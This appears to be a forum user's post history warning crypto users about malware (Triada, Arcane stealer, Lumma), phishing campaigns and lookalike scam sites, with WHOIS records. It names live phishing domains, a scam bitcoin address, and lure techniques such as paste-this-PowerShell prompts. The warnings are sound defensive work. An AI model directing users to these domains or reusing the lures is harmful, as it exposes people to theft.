Show Posts
|
Pages: [1] 2 3 4 5 6 »
|
A new version of Triada was recently discovered by Kaspersky. And per analysis, it has reported that it was able to transfer $270,000 in various cryptocurrencies already. But the numbers could be higher as this malware targets Monero. And this is a type of clipboard malware that's why it was very easy for them to trap their victims as they could have not suspected that there are changes when they make transactions. One way to lure their victims is offering mobile phones that are cheap but then it is laden with this malware that's why no one will suspect it initially until it was too late. And below are the capabilities of this malware: ● steal user accounts in instant messengers and social networks, in particular Telegram and TikTok;
● secretly send messages allegedly on behalf of the victim in WhatsApp** and Telegram, and also delete them to erase traces;
● steal cryptocurrency by replacing crypto wallet addresses in the required applications;
● monitor the victim’s activity in browsers and replace links;
● replace numbers during calls - to redirect the subscriber to the contact needed by the attackers;
● control SMS: intercept, send and delete messages;
● allow sending premium SMS to receive paid services;
● download and run other programs on the infected smartphone;
● block network connections, for example, to interfere with the operation of anti-fraud systems.
https://www.kaspersky.ru/about/press-releases/novaya-versiya-triada-kradyot-kriptovalyutu-akkaunty-v-messendzherah-i-podmenyaet-nomera-telefonov-vo-vremya-zvonkovAnd it fits perfectly what we have learn so far in crypto, it if is too good to be true, then probably is. So just buy your phone on authorized dealer and don't let be trap by those cheap offerings that you can find online as you could be the next victim.
|
|
|
There is a new malware, called Arcane stealer. It's a variant of Phemedrone Stealer malware. One way of it's spread is thru Youtube, so the attackers promoted a game hack and it's usually in Russian language. So in the video, it will have a link to an archive file and it's a password protected, and one you unlock the archive, there is a batch file and the UnRAR.exe.  So it's not just a cryptominer, but also targets login credentials, passwords, credit card data, and cookies from various Chromium- and Gecko-based browsers. And targets includes crypto wallets as well: - VPN clients: OpenVPN, Mullvad, NordVPN, IPVanish, Surfshark, Proton, hidemy.name, PIA, CyberGhost, ExpressVPN
- Network clients and utilities: ngrok, Playit, Cyberduck, FileZilla, DynDNS
- Messaging apps: ICQ, Tox, Skype, Pidgin, Signal, Element, Discord, Telegram, Jabber, Viber
- Email clients: Outlook
- Gaming clients and services: Riot Client, Epic, Steam, Ubisoft Connect (ex-Uplay), Roblox, Battle.net, various Minecraft clients
- Crypto wallets: Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, Atomic, Guarda, Coinomi
https://securelist.com/arcane-stealer/115919/And again, we shouldn't be downloading anything from unknown sources, specially game cheats like this one.
|
|
|
So in seems that there are new wave of Coinbase Phishing email attacks like the one below.  And from the looks of it, seems very legit, but upon closer inspection, the source of the email is very suspecting, The thing is that this is a clever approach by the attackers, and reverse of what we have been seeing before. There is no phishing link that when you click or downloaded it, the malware will steal your credentials, like pass phrase. Here, the attackers will give you to 12 digit mnemonic phrase and then let you transfer all your crypto to that wallet and once you transfer, there could be bot that will automatically transfer it to a new wallet that the attackers have control. So if you got this email, delete it as this is an obvious phishing email from the attackers. https://gbhackers.com/fake-coinbase-migration-messages-target-users/
|
|
|
It's seems that criminals have shift their focus to a new trend, that is many people are searching for PDF and then you will be redirected to a site that you need to fill in a fake captcha As Netskope Threat Labs extends its hunt for phishing campaigns leveraging PDFs, fake CAPTCHAs, and SEO poisoning, we observed more than 260 unique domains hosting phishing PDF files. While Webflow leads all domains for hosting phishing PDFs, other noteworthy content delivery domains include GoDaddy, Strikingly, Wix, and Fastly. Notably, three of the top 15 domains are content delivery networks related to GoDaddy, which are wsimg.com, s123-cdn-static.com, and f-static.net.
Cyber criminals attack started when they to online libraries like https://pdfcoffee.com/ https://pdf4pro.com/ https://pdfbean.org/
So once you go to this website and search their something and unfortunately download a pdf that is poison leaden with malware like in this example,  And most likely it is with a Lumma stealer. Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
So this is just a warning for those for those who are downloading PDF's and on other sites. That when you see a captcha then you have to think twice before downloding or executing any thing as you might be the next victim here. https://www.netskope.com/blog/fake-captchas-malicious-pdfs-seo-traps-leveraged-for-user-manual-searches
|
|
|
https://x.com/vxunderground/status/1881946956806926351Just want to give everyone a heads-up regarding the news about Ross Ulbricht being freed by the Trump administration. There are set of threat actors who are taking advantage of it in X. They used a fake but verified Ross Ulbricht accounts on X, then instruct people to a malicious Telegram channels, presenting itself as a official Ulbricht portals. And after you are re-directed to it, you will be walk thorough fake verification process name "Safeguard". And then mini app with automatically copies a PowerShell command and then it will instruct you to open the Windows run dialog and paste that command. Which eventually will download a zip file at With a Cobalt Strike loader ( https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike). So never ever download or even execute or even run it in a dialog. Even if you are so called advance users, you don't know what's inside the PowerShell or that zip file.
|
|
|
It was unraveled that there was a malicious app on Google play that is targeting crypto enthusiast and obviously it is designed to be a mobile device to be used by many of us. And it has a good evasion technique that's why it was under the radar for quite sometime (five months) now and it could have victimized already. One method it uses is that it exploited the trusted name of "WalletConnect" protocol. And then it has a group of armies to make fake reviews as well that's why it got 10,000 downloads and it was even rank high in search engines. It is said that it was able to drain crypto users of about $70,000 before being caught and removed.  https://research.checkpoint.com/2024/wallet-scam-a-case-study-in-crypto-drainer-tactics/And it seems that this criminals is shifting to mobile devices kind of attacks. So we should really be careful of anything that we download specially crypto apps from Google store and we should very everything first, before connecting our wallets. Although this has been taking down, for sure, this criminals are not going to stop and could be coming up with another kind of downloads.
|
|
|
Europol has reported that it has taken down a major international criminal network engaged in unlocking stolen or lost mobile phones through a phishing platform.  Investigators reported 483 000 victims worldwide, who had attempted to regain access to their phones and been phished in the process. The victims are mainly Spanish-speaking nationals from European, North American and South American countries.
The successful operation took place thanks to international cooperation between law enforcement and judiciary authorities from Spain, Argentina, Chile, Colombia, Ecuador and Peru.
The action week took place between 10 and 17 September and resulted in 17 arrests, 28 searches and 921 items seized, mainly mobile phones but also other electronic devices, vehicles and weapons. https://www.europol.europa.eu/media-press/newsroom/news/criminal-phishing-network-resulting-in-over-480-000-victims-worldwide-busted-in-spain-and-latin-americaI guess this is a big win for Europol in their fight against cyber criminals. There are a big group and we can see that they've almost victimized half a million people around Lat-Am alone. Hopefully there will be more criminal gangs that will be taken out by the authorities, specially those who targets crypto enthusiast.
|
|
|
A new clipboard malware has emerge and exclusively targeting Italy via phishing campaign. Below is the infection chain, Infection chain:  The email usually comes a German email address that really looks legit. And then it has a attached invoice embedded in link. And once you click it, it will redirect you to a malicious website. And once the Zip archive is opened, it will download and then deploy a dropper, a multi functional RAT payload. And it's functionalities includes the following:  So it's has capabilities that is very dangerous to crypto enthusiast, as it could be a clipper malware and then steal our password as well, so not just in crypto but like in banking apps that we have in our system. Take note that right now, it targets Italy, but the code of the malware itself is Brazilian or Portuguese speaking so this might evolved later to target Lat-Am. https://securelist.com/sambaspy-rat-targets-italian-users/113851/
|
|
|
I'm pretty sure that majority of us have used PDF before and have used either Adobe Acrobat PDF reader, or the alternative FoxIt PDF reader. The later then was recently used by cyber criminals to deliver their malware and somewhat as a crypto enthusiast we are one of the targets as it has crypto miner and crypto wallets. First you might received this kind of email and if you click on the attached link, you might see the below:  And once you click "OK", a second pop up will appear  And if you are unsuspecting about everything and then click, "Open". It will then download and executed the malware's payload. These are all the system information that this hackers are going to get from you,  And as recommended: Until the software update is applied, Foxit users are advised to remain vigilant about potential exploitation and adhere to classic defense practices. To mitigate the risks of being affected by such threats, it is essential to:
- Keep operating systems and applications updated through timely patches and other means. - Be cautious of unexpected emails with links, especially from unknown senders. - Enhance cybersecurity awareness among employees. - Consult security specialists for any doubts or uncertainties.
This is just a heads-up, we are really exposed to this cyber threat now as we approach the bull run and so everyone should be very careful. https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/
|
|
|
I'm pretty sure that the Twitter hack is still fresh in our memory, this is high profile because it involves a lot of crypto exchanges like, @coinbase, @Gemini, and @binance and then celebrities, @JeffBezos, @BarackObama, @elon_musk, @JoeBiden, @BillGates, and @WarrenBuffett. And Graham Ivan Clark was charge last year and now agreed on Tuesday to be sentenced as a youthful offender to three years in prison, + three years of probation. Here are the official docs: https://www.documentcloud.org/documents/20515610-plea-agreement-acknowledgment-of-waiver-of-rights-bc-6f018852-673e-4df1-85da-4c5629856265https://www.sao13th.com/2021/03/prosecutors-reach-plea-agreement-in-case-of-twitter-hacker-graham-clark/ (please note that access might be block for some region due to security reasons). What are your thoughts of the sentencing? he has served seven months already of the three years sentenced on him.
|
|
|
I was quite surprised to see this error, actually if was my first time to see this kind of message from this forum. Been here for some time now so I'm wondering if others have seen this kind of error message before. I know that you can just refresh to restore the tab. But I'm just curious though.  Note: this coincides with bitcoin hits $40k again so probably there are a lot of online users right now causing this kind of error
|
|
|
I saw this post of @Xal0lex here, and it didn't took so long to identify another fake site. Original: https://[banned mixer]/en/Archive: https://archive.is/qrVRMRegistrant REDACTED FOR PRIVACY Registrant Country gb Registrar 1API GmbH IANA ID: 1387 URL: http://www.1api.netWhois Server: whois.1api.net (p) Registrar Status clientTransferProhibited Dates 23 days old Created on 2020-12-27 Expires on 2021-12-27 Updated on 2021-01-01 IP Address 104.18.40.235 - 462 other sites hosted on this server Image of the fake site below, you can't see any difference visually, isn't it?  So very careful, this is another warning to all of us, mixers are prime target as well. And even though this mixers is not that well-known (this is the first time I heard of it), but still we will never know.
|
|
|
What happened: Fake OnX Swap website Website: Archived: https://archive.is/sdFcrOriginal website: https://app.onx.finance/dashboardWhois Record for OnXSwap.online How does this work? Domain Profile Registrant Org Not Applicable Registrant Country us Registrar Hostinger, UAB IANA ID: 1636 URL: — Whois Server: whois.hostinger.com
(p) Registrar Status clientTransferProhibited, serverTransferProhibited Dates 14 days old Created on 2020-12-29 Expires on 2021-12-30 Updated on 2021-01-03 Name Servers NS1.DNS-PARKING.COM (has 815,330 domains) NS2.DNS-PARKING.COM (has 815,330 domains) Tech Contact — IP Address 151.106.97.138 - 62 other sites hosted on this server IP Location Germany - Bayern - Nuremberg - Hostinger International Limited ASN Germany AS47583 AS-HOSTINGER, CY (registered Apr 04, 2011) IP History 1 change on 1 unique IP addresses over 1 years Hosting History 1 change on 2 unique name servers over 1 year
|
|
|
Tornado cash - https://tornado.cash/, "a non-custodial Ethereum and ERC20 privacy solution based on zkSNARKs. It improves transaction privacy by breaking the on-chain link between the recipient and destination addresses", is now being clone as well by cyber actors. The fake website:  Archived: https://archive.is/zYvKTRegistrant Org WhoisGuard, Inc. Registrant Country pa Registrar NameCheap, Inc. IANA ID: 1068 URL: http://www.namecheap.comWhois Server: whois.namecheap.com (p) Registrar Status serverTransferProhibited Dates 37 days old Created on 2020-12-06 Expires on 2021-12-06 Updated on 2020-12-06 IP Address 104.31.77.95 - -1 other site is hosted on this server The real website is: https://app.tornado.cash/. And this is how it looks:  Almost the same and it's hard to distinguished initially. This is the official github repo: https://github.com/tornadocash/tornado-core
|
|
|
What happened: New Bustabit phishing site Website  Archive: https://archive.is/C0tx9Whois Record for BustaBit.cam How does this work? Domain Profile Registrant Org WhoisGuard, Inc. Registrant Country pa Registrar Namecheap IANA ID: 1068 URL: https://namecheap.comWhois Server: whois.namecheap.com (p) Registrar Status addPeriod, clientTransferProhibited, serverTransferProhibited Dates 1 days old Created on 2021-01-10 Expires on 2022-01-10 Updated on 2021-01-10 Tech Contact — IP Address 63.250.38.6 - 534 other sites hosted on this server It seems that the attack on bustabit continues, like this one, just 1 day old website, freshly created by this criminals to take advantage of those who uses Google to search for bustabit games.
|
|
|
What happened: Fake Balancer website Website: https://bolancer.exchange/ Original Website: https://balancer.exchange/#/swap Image of fake website: Whois Record for BoLancer.exchange How does this work? Domain Profile Registrant REDACTED FOR PRIVACY Registrant Org See PrivacyGuardian.org Registrant Country us Registrar NameSilo, LLC IANA ID: 1479 URL: http://www.namesilo.comWhois Server: www.namesilo.com/whois.php(p) Registrar Status clientTransferProhibited Dates 14 days old Created on 2020-12-27 Expires on 2021-12-27 Updated on 2021-01-01 IP Address 172.67.190.61 - 21 other sites hosted on this server
|
|
|
There is another fake blockchain.com, which is just 4 day old, actually it was a redirection from: to  Archive: https://archive.is/J3NyvRegistrant WhoisGuard Protected Registrant Org WhoisGuard, Inc. Registrant Country pa Registrar NAMECHEAP INC NameCheap, Inc. IANA ID: 1068 URL: http://www.namecheap.comWhois Server: whois.namecheap.com (p) Registrar Status addPeriod, clientTransferProhibited Dates 4 days old Created on 2020-11-21 Expires on 2021-11-21 Updated on 0000-12-31 IP Address 209.97.129.163 is hosted on a dedicated server So watch out for this kind of attacks, need to be very careful as the price of bitcoin is almost at a all time high again. And I need everyone to help me report this website to: https://safebrowsing.google.com/safebrowsing/report_phish/?hl=en or direct to the domain registrar: https://support.namecheap.com/index.php?/Tickets/Submit->Abuse Reports->Fraud / Phishing
|
|
|
There is a phishing site of Foxmixer.com. It might not be a popular mixing services, but they have their ANN thread here, ✰ [ANN] FoxMixer.com ✰✰✰ The High Quality Bitcoin Mixer ✰✰✰ 3+ Years Online ✰. Website: www.xn--foxmixr-y8a.com https://www.foxmixėr.com/  The real website is: https://www.foxmixer.com/Whois Record for Foxmixėr.com How does this work? Domain Profile IP Address 198.54.116.178 - 730 other sites hosted on this server IP Location United States Of America - Georgia - Atlanta - Namecheap Inc. ASN United States Of America AS22612 NAMECHEAP-NET, US (registered Jun 21, 2011) Domain Status Never Registered Before IP History 1 change on 1 unique IP addresses over 0 years Registrar History 1 registrar Hosting History 1 change on 2 unique name servers over 0 year
|
|
|
Since Paypal have joined the crypto currency band wagon, scammers was very quick to take advantage and created a website for a supposedly Paypal giveaway. This is obvious fake and malicious and who's intention is to trap crypto enthusiast and play with their emotions and greed. So please do not fall for this scheme. Website: Archived: https://archive.is/uuqT1Bitcoin address: 1PAYPRAKcnQyqnLMA7WyLTyzWakXVidx6W The address has somewhat a balance of 0.00037650 BTC already.  Registrant Org Maslov Anatoliy Zaharovich Registrant Country ru Registrar Regional Network Information Center, JSC dba RU-CENTER IANA ID: 463 URL: https://www.nic.ru/whoisWhois Server: https://www.nic.ru/whois(p) Registrar Status clientTransferProhibited, serverTransferProhibited Dates 28 days old Created on 2020-10-25 Expires on 2021-10-25 Updated on 2020-11-10 Name Servers NS3.NIC.RU (has 551,119 domains) NS4.NIC.RU (has 551,119 domains) NS8.NIC.RU (has 551,119 domains) Tech Contact — IP Address 195.24.68.9 - 2,361 other sites hosted on this server IP Location Russian Federation - Moskva - Moscow - Jsc Ru-center ASN Russian Federation AS48287 RU-CENTER, RU (registered Nov 04, 2008)
|
|
|
|